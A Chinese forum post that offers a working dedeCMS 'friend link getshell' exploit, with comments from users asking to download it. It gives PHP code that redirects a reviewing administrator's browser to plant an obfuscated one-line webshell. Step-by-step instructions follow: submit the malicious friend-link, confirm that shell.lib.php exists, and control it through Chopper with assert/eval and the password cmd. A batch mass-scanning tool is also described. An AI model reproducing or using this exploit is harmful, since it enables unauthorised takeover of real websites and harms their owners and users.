dedeCMS友情链接getshell漏洞利用工具(附exp)
不多说一类多说的吧直接上exp
<?php
//print_r($_SERVER);
$referer = $_SERVER['HTTP_REFERER'];
$dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后台的路径
//拼接 exp
$muma = '<'.'?'.'p'.'h'.'p'.' '.'p'.'h'.'p'.'i'.'n'.'f'.'o'.'('.')'.';'.'?'.'>'.'<'.'?'.'p'.'h'.'p'.' '.'e'.'x'.'t'.'r'.'a'.'c'.'t'.'('.'$'.'_'.'G'.'E'.'T'.')'.'.'.'$'.'a'.'('.'$'.'b'.'['.'0'.']'.')'.';'.'?'.'>';
$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';
$url = $dede_login.$exp;
//echo $url;
header("location: ".$url);
// send mail coder
exit();
?>
使用代码存为PHP文件,上传到你的空间。去提前友连申请,网址填写你上传后的地址。
站长审核后台友情连接时会生成一句话地址为/include/taglib/shell.lib.php
御剑字典添加/include/taglib/shell.lib.php测试是否存活即可
最后菜刀访问传参一句话http://site.com/include/taglib/shell.lib.php?a=assert&b[0]=@eval($_POST[cmd]);
密码为cmd
当然也有大牛研究出来了工具
使用说明
1、左侧右键导入网址
2、中间右键点击配置可打开右侧功能区
3、修改key.ini文件里面的www.xxx.com/dede.php 替换成自己的即可
4、扫描完毕之后点击开始获取即可获取验证码,点击手工插入即可进行插入功能,下次会自动获取验证码,直接输入
验证码,进行手工插入即可。
4、多线程批量扫描,可自定义线程,可以导入大量url工作。
管理员设置回复可下载
评论
669条评论yangtianba Lv.1
Chrome 69.0.3497.100 
Windows 7 x64 Edition 回复
我要下载谢谢
云南省临沧市 电信
yangtianba Lv.1
Chrome 69.0.3497.100 
Windows 7 x64 Edition 回复
66666666666
云南省临沧市 电信
wanmidi Lv.1
Chrome 64.0.3282.140 
Windows 回复
666666666a !~~~
安徽省阜阳市 电信
2068039800 Lv.2
Chrome 70.0.3538.25 
Windows 7 x64 Edition 回复
很好。很强大
四川省德阳市 移动
2068039800 Lv.2
Chrome 63.0.3239.132 
Windows 7 x64 Edition 回复
大神威武 谢谢 很好 很好很高尚a
四川省德阳市 移动
2068039800 Lv.2
Chrome 63.0.3239.132 
Windows 7 x64 Edition 回复
大佬牛逼 谢谢了
四川省德阳市 移动
2068039800 Lv.2
Chrome 63.0.3239.132 
Windows 7 x64 Edition 回复
大佬牛逼啊
四川省德阳市 移动
akdepuquan Lv.2
Chrome 75.0.3770.100 
Windows 7 回复
66addsadfafksdnfsdnfnsdfnsdnklfs
日本
akdepuquan Lv.2
Chrome 75.0.3770.100 
Windows 7 回复
大神威武 谢谢
日本
akdepuquan Lv.2
Chrome 75.0.3770.100 
Windows 7 回复
大神威武 谢谢 很好 很好很高尚a
日本